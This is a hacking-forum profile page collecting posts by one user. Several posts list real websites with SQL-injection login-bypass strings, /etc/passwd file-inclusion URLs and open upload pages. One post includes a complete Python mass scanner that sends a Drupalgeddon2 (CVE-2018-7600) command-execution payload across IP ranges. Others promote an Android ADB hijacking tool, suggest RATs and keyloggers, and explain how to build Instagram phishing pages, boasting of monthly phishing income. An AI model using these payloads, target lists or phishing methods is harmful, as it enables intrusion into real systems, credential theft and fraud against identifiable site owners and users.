mesvak

Members
  • Content Count

    2,689
  • Last visited

  • Days Won

    4

Everything posted by mesvak

  1. [hide] MESVAK SQL SCRIPT NAB Page Found:http://www.jpinfoweb.com.br/imobiliaria8/adm/index.php '=' 'or' MESVAK SQL SCRIPT NAB Page Found:https://euthaliaglobal.com/emp_welcome.php ' OR 1 --+ MESVAK SQL SCRIPT NAB Page Found:http://www.aapta-jp.com/emp_welcome.php ' OR 1 --+ MESVAK SQL SCRIPT NAB Page Found:http://www.zgkyedu.com/adminis/index.php '=' 'or' MESVAK SQL SCRIPT NAB Page Found:https://ccrhscholarship.in/rdashboard.php '=' 'or' MESVAK SQL SCRIPT NAB Page Found:https://krispolymers.com/admin/ '=' 'or' MESVAK SQL SCRIPT NAB Page Found:http://www.pouptempo.com/imoveis/adm/index.php '=' 'or' MESVAK SQL SCRIPT NAB Page Found:https://www.house2homeuk.com/admin/index.php '=' 'or' MESVAK SQL SCRIPT NAB Page Found:http://www.officialpubguide.com/admin/index.php '=' 'or' [/hide] I TAKE NO RESPONSIBILITY FOR DOING ANYTHING ON THESE SITES
  2. [hide] bug lfi done PERL.OUT: http://www.optilink.mx/interior/index.php?cdo=../../../../../etc/passwd http://www.cddk.ru/autohtml.php?filename=../../../../../../../etc/passwd [/hide] I TAKE NO RESPONSIBILITY FOR DOING ANYTHING ON THESE SITES
  3. [hide] UPLOADER FOUND : https://www.collectivecopies.com/upload/ http://www.secespol.com/pub/editor/FCKeditor/editor/filemanager/connectors/uploadtest.html https://www.collectivecopies.com/upload/ https://ebeam.mff.uw.edu/code/upload/phUploader.php http://www.dfreload.com/file_host/index.php [/hide] I TAKE NO RESPONSIBILITY FOR DOING ANYTHING ON THESE SITES
  4. WELP THE THING THAT I CAN SAY IT IS THERE ARE INFINITE METHODS AND SCANNERS WRITTEN IN DIFF LANGS HERE I WILL GO AHEAD AND STRAIGHTLY HIT THE POT 1-ACOUNTIX WELP AS ALL OF U MIGHT OR MIGHT NOT NO ABOUT THIS SHIT THIS IS KINDA GOOD SHIT FOR FINDING VULN AND EXPLOITS (XSS, LFI, CRLF, SQL, SHELLS, EXPLOITS,...) 2-PYMAP SCANNER (https://github.com/azizaltuntas/Pymap-Scanner) TAKE A LOOK AT it's NOT BAD 3-WAPITI tbh I had fun with this gay tool and it's perfect, and I can say the privileges are injecting xxe,XSS,crlf,XPath and one HQ shit executing commands ooooof its gud idk whether you can find the new version or something like this now cause used it like one year ago (version 3 ) (Generates vulnerability reports in various formats (HTML, XML, JSON, TXT Can suspend and resume a scan or an attack Can give you colors in the terminal to highlight vulnerabilities Different levels of verbosity Adding a payload can be as easy as adding a line to a text file Support HTTP and HTTPS proxies Authentication via several methods: Basic, Digest, Kerberos or NTLM Ability to restrain the scope of the scan (domain, folder, webpage) Safeguards against scan endless-loops (max number of values for a parameter) Can exclude some URLs of the scan and attacks (e.g.: logout URL) Extract URLs from Flash SWF files Try to extract URLs from javascript (very basic JS interpreter) ) 4-damn fucking freaky vuln finder oooof such a significant one 3 years ago I can say one of the first apps I tried https://github.com/ethicalhack3r/DVWA welp one suggestion don't use it on your devices or whatsoever go on RDP or open it on virtual box, and tbh it's not useful anymore I don't think so 5-https://github.com/almandin/fuxploider fuxploider written on python not bad didn't work too much with this one 6-netsparker this is so good cz its updatable and the new version got cracked ezily, so its good to have a look version I have version 5 .000. something its kinda good but I don't use it tbh 7-sqlmap it's fucked up but for the beginning is good but in the while it would get fucking boring and so shitty af i would rather do it by my hands then trusting this or do it with multiple shits like acuntix and sqlmap and one more 8-https://github.com/zigoo0/webpwn3r begining of my learning to get the py out of shit was with this not only this but yeah it helped me so this is gud and its simple only three files one is gay and other 2 are simple just understand the main one and u will get how to code something like a scanner .... And there are some more like z3nom & zarp ....... but tbh i would suggest you guys to code the scanner by ur own gay hands its not big deal tbh as you can see all of em are just to ez to be coded just lil bit training one code which is rly good to have a look #written by gay hands msv import argparse import ipaddress import itertools import re import requests import sys import time #functions niga def exploit(ip_targets): send_params = {'q':'user/password', 'name[#post_render][]':'passthru', 'name[#markup]':'id', 'name[#type]':'markup'} send_data = {'form_id':'user_pass', '_triggering_element_name':'name'} ipregex = re.compile("(\d{1,3}\.){3}\d{1,3}.*") num_scanned = len(ip_targets) num_vuln = 0 time_start = time.time() for ip_target in ip_targets: result = ipregex.match(ip_target) ip_target = "http://"+ip_target if result is not None: r = None print("{:=<74}".format("")) print("[~] {:<60} [{:^7}]".format(ip_target, "..."), end="", flush=True) if verbose == True: try: r = requests.post(ip_target, data=send_data, params=send_params, timeout=3) except requests.exceptions.Timeout: print("\r[~] {:<60} [{:^7}]".format(ip_target, "ERR")) print("{:>7} ERROR: Server seems to be down (Timeout)".format("--")) continue except requests.exceptions.ConnectionError: print("\r[~] {:<60} [{:^7}]".format(ip_target, "ERR")) print("{:>7} ERROR: Unable to connect to the webserver (Connection Error)".format("--")) continue except requests.exceptions.HTTPError: print("\r[~] {:<60} [{:^7}]".format(ip_target, "ERR")) print("{:>7} ERROR: 4xx/5xx".format("--")) continue except requests.exceptions.InvalidURL: print("\r[~] {:<60} [{:^7}]".format(ip_target, "ERR")) print("{:>7} ERROR: Invalid URL.".format("--")) continue except Exception: print("\r[~] {:<60} [{:^7}]".format(ip_target, "ERR")) print("{:>7} ERROR: Unexpected Error".format("--")) sys.exit() else: print("\r[~] {:<60} [{:^7}]".format(ip_target, "OK")) print("{:>7} OK: Alive".format("--")) else: try: r = requests.post(ip_target, data=send_data, params=send_params, timeout=5) except Exception: print("\r[~] {:<60} [{:^7}]".format(ip_target, "ERR")) continue else: print("\r[~] {:<60} [{:^7}]".format(ip_target, "OK")) #Finding block of data to check server type ffs m = re.search(r'', r.text) if m: if verbose == True: print("{:>7} OK: Server seems to be running Drupal".format("--")) found = m.group(1) send_params2 = {'q':'file/ajax/name/#value/' + found} send_data2 = {'form_build_id':found} r = requests.post(ip_target, data=send_data2, params=send_params2) r.encoding = 'ISO-8859-1' out = r.text.split("[{")[0].strip() if out == "": print("{:>7} Patched (CVE-2018-7600)".format("--")) continue else: print("{:>7} Vulnerable (CVE-2018-7600)".format("--")) num_vuln += 1 else: print("{:>7} Doesnt seem like a Drupal server?".format("--")) continue else: raise ValueError("Invalid IP Address") time_fin = time.time() print("{:=<74}".format("")) print("[+] {} target(s) scanned, {} target(s) vulnerable (CVE-2018-7600)".format(num_scanned, num_vuln)) print("[+] Scan completed in {:.3f} seconds".format(time_fin-time_start)) def process_file(target): hostlist = [] try: file = open(target, "r") for line in file: hostlist.append(line.strip()) exploit(hostlist) except FileNotFoundError: print("[!] Unable to locate file. Check file path.") sys.exit() except ValueError: print("[!] Invalid value in file. Ensure only IPv4 addresses exist!") sys.exit() except Exception as e: print(e) print("[!] Unexpected Error! contact me niba ") sys.exit() def process_multiple(target): hostlist = target.split(",") try: for data in hostlist: data = data.strip() exploit(hostlist) except ValueError: print("[!] Invalid Input. Only IPv4 addresses are accepted.") sys.exit() except Exception: print("[!] Unexpected Error! contact me niba ") sys.exit() def process_range(target): try: hostlist = [] raw_octets = target.split(".") octets = [x.strip().split("-") for x in raw_octets] octet_range = [range(int(x[0]), int(x[1])+1) if len(x) == 2 else x for x in octets] for x in itertools.product(*octet_range): hostlist.append('.'.join(map(str,x)).strip()) exploit(hostlist) except ValueError: print("[!] Invalid Input. Only IPv4 ranges are accepted.") sys.exit() except Exception as e: print(e) print("Unexpected Errror") sys.exit() def process_ip(target): try: exploit([target.strip()]) except ValueError: print("[!] Invalid Input. Only IPv4 & valid CIDR addresses are accepted for IP mode.\n{:>7} Use -h to see other modes.".format("--")) sys.exit() except Exception: print("[!] Unexpected Error contact me niba ") sys.exit() def process_cidr(target): hostlist = [] try: net = ipaddress.ip_network(target.strip(), strict=False) for host in net.hosts(): hostlist.append(str(host)) exploit(hostlist) except ValueError: print("[!] Invalid Input. Only IPv4 & valid CIDR addresses are accepted for IP mode.\n{:>7} Use -h to see other modes.".format("--")) sys.exit() except Exception: print("[!] Unexpected Error contact me niba ") sys.exit() #main here def main(): parser = argparse.ArgumentParser(prog="drupalgeddon2-scan.py", formatter_class=lambda prog: argparse.HelpFormatter(prog,max_help_position=50)) try: parser.add_argument("target", help="IP of target site(s)") parser.add_argument('-c', "--cidr", default=False, action="store_true", help="Generate & scan a range given a CIDR address") parser.add_argument('-f', "--file", default=False, action="store_true", help="Retrieve IP Addresses from a file (1 per line)") parser.add_argument('-i', "--ip", default=True, action="store_true", help="Single IP Address (CIDR migrated to a seperate mode)") parser.add_argument('-m', "--multiple", default=False, action="store_true", help="Multiple IP Adddress e.g. 192.168.0.1,192.168.0.2,192.168.0.3") parser.add_argument('-r', "--range", default=False, action="store_true", help="IP Range e.g. 192.168.1-2.0-254 (nmap format)") parser.add_argument('-v', "--verbose", default=False, action="store_true", help="Provide a more verbose display") parser.add_argument("-o", "--http-only", default=False, action="store_true", help="To be implemented (Current state, https not implemented)") parser.add_argument("-s", "--https-only", default=False, action="store_true", help="To be implemented") except Exception: print("[!] Unexpected Error! contact me niba ") sys.exit() try: args, u = parser.parse_known_args() except Exception: print("[!] Invalid arguments!") sys.exit() #renaming variable global verbose verbose = args.verbose #Verbose message print("[~] Starting scan...") #IP range in a CIDR format if args.cidr == True: process_cidr(args.target) #IPs from a file elif args.file == True: process_file(args.target) #Multiple IPs (separated w commas) elif args.multiple == True: process_multiple(args.target) #IP Range (start-end) elif args.range == True: process_range(args.target) #IP Address/CIDR elif args.ip == True: process_ip(args.target) #Unrecognised arguments else: print("[!] Unexpected Outcome! contact me niba ") sys.exit() sys.exit() #ifmain here if __name__ == "__main__": try: main() except KeyboardInterrupt: print ("\n-- Ctrl+C caught. Terminating program.") except Exception as e: print(e) print("[!] Unexpected Error! contact me niba ")
  5. [hide] http://www.pennings.co.uk/uploadfile.asp?action=upload&id=&type=&folder=cv&completedreviweref=&allowmultiple= [/hide]
  6. [hide] Hack Android Devices just with an IP address using ADB connect feature. You can also exploit millions of devices from Shodan using this tool. https://github.com/Zucccs/PhoneSploit [/hide]
  7. [hide] Drltrace is a dynamic API calls tracer for Windows and Linux applications designed primarily for malware analysis. https://github.com/mxmssh/drltrace [/hide]
  8. sorry for ur lost m8 for both of them ur acc and ur money ::pepe: XD XDDDDDDDDDDDdd :kappa:
  9. yeah I had a feeling snapchat is too secure but I know how to make a phising page but like how do you convince them to put all their shit in? free followers free viewers free likes and something like that u would do some arts and designing as well like a shop or something u can do it even with block chain which i did XD
  10. i would suggest u using lucky patcher or more pro way use cheat engine then go to kali and u can do it there
  11. u would be fine no worry D
  12. u want something liek a rat or virus that spread out when it hits the target i guess they are all viruses it doesnt matter if when they pop up they will be shown as an add or something like that they are also called viruses and about arduino thats privilage you could use that to make some good shits cz that is based on c++ and c gl
  13. they are so many rats free that would give u that dont spend ur money on bullshits u can do key logger with c++ and if uwanna go further i will suggest bash and ruby
  14. i dont get what u mean u want serial code or what hack a compiler are u fucking retarded :/
  15. there is nothing like cuase there is not that script written or hidden in the actual source code so basically is not possible
  16. yes i did make for season 7 welp wat kind u want
  17. here is no hack '' the other shitty sites or ur friends if saying hack that's fucking plebness so let me say what methods u can get eziest way is try to rat or trojan ur target and get data 2- try to crack their accs (snap chat there is not many havent seen in a while but Instagram many or you can pay some coders to code it for ya im not doing it but i crack them and know inside out and code for my self. be aware of skemmers some of them will tell you i will code them for this much and u give money and they code something which wont get to capture so that will fuck ur acc up and u wont be able to login or even check like huge combo it would just do with only like 100 ) 3- phishing it might be eziest i donno tbh either this one or first one is easiest so basically u make the phishing site the same thing as instagram with same login page and send it to target with some info and knowing HOW TO SE YOU CAN MAKE UR TARGET TO go to that page and fill the info like user & pass ( he might not be dumb as well ) welp i used to use this shit alot not on instagram but on garena if u know that client there was a time that u could sell shells on garena and i made the fake one with free host got some $$$ out of it about 4k monthly I cant think of more right now XD MY iNStagram Id : mesvak
  18. here is no hack '' the other shitty sites or ur friends if saying hack that's fucking plebness so let me say what methods u can get eziest way is try to rat or trojan ur target and get data 2- try to crack their accs (snap chat there is not many havent seen in a while but Instagram many or you can pay some coders to code it for ya im not doing it but i crack them and know inside out and code for my self. be aware of skemmers some of them will tell you i will code them for this much and u give money and they code something which wont get to capture so that will fuck ur acc up and u wont be able to login or even check like huge combo it would just do with only like 100 ) 3- phishing it might be eziest i donno tbh either this one or first one is easiest so basically u make the phishing site the same thing as instagram with same login page and send it to target with some info and knowing HOW TO SE YOU CAN MAKE UR TARGET TO go to that page and fill the info like user & pass ( he might not be dumb as well ) welp i used to use this shit alot not on instagram but on garena if u know that client there was a time that u could sell shells on garena and i made the fake one with free host got some $$$ out of it about 4k monthly I cant think of more right now XD MY iNStagram Id : mesvak
  19. there is no hack '' the other shitty sites or ur friends if saying hack that's fucking plebness so let me say what methods u can get eziest way is try to rat or trojan ur target and get data 2- try to crack their accs (snap chat there is not many havent seen in a while but Instagram many or you can pay some coders to code it for ya im not doing it but i crack them and know inside out and code for my self. be aware of skemmers some of them will tell you i will code them for this much and u give money and they code something which wont get to capture so that will fuck ur acc up and u wont be able to login or even check like huge combo it would just do with only like 100 ) 3- phishing it might be eziest i donno tbh either this one or first one is easiest so basically u make the phishing site the same thing as instagram with same login page and send it to target with some info and knowing HOW TO SE YOU CAN MAKE UR TARGET TO go to that page and fill the info like user & pass ( he might not be dumb as well ) welp i used to use this shit alot not on instagram but on garena if u know that client there was a time that u could sell shells on garena and i made the fake one with free host got some $$$ out of it about 4k monthly I cant think of more right now XD
  20. WHAT DOES JOKER OR ADMIN DO APPARENTLY HE IS NOT solving reports and anything else can u explain that to me pls :/ :kappa: @jocker despite the fact he is the saviour of my acc to be here and me to be active here if he didnt give me infinity i wouldnt be here tbh :/ :fappa: and you would have such a gay community without me ::kappa:
  21. agreed havent seen anything from jocker tbh he doesnt do anything ::kappa: But its ok new admins will do something and jocker will retire i guess :kappa: :kappa: :kappa: :kappa: hopefully
  22. [hide] https://pastr.io/view/dRAJKN [/hide]
  23. [hide] MESVAK SQL SCRIPT NAB Page Found:http://jharkhandminingshow.com/admin '=''or' MESVAK SQL SCRIPT NAB Page Found:http://sherkol.com/admin '=''or' [/hide] I TAKE NO RESPONSIBILITY FOR DOING ANYTHING ON THESE SITES
  24. As you can read the topic I will hit the note in a min so basically we can have admins for every section for example for cracking section we can have multiple admins and each admin for one part ( cracking tools, cracking tutorial,..... ) and same goes for hacking section i guess we needa have 1 or 2 admins for hacking section and so on brief shit i think u might get my idea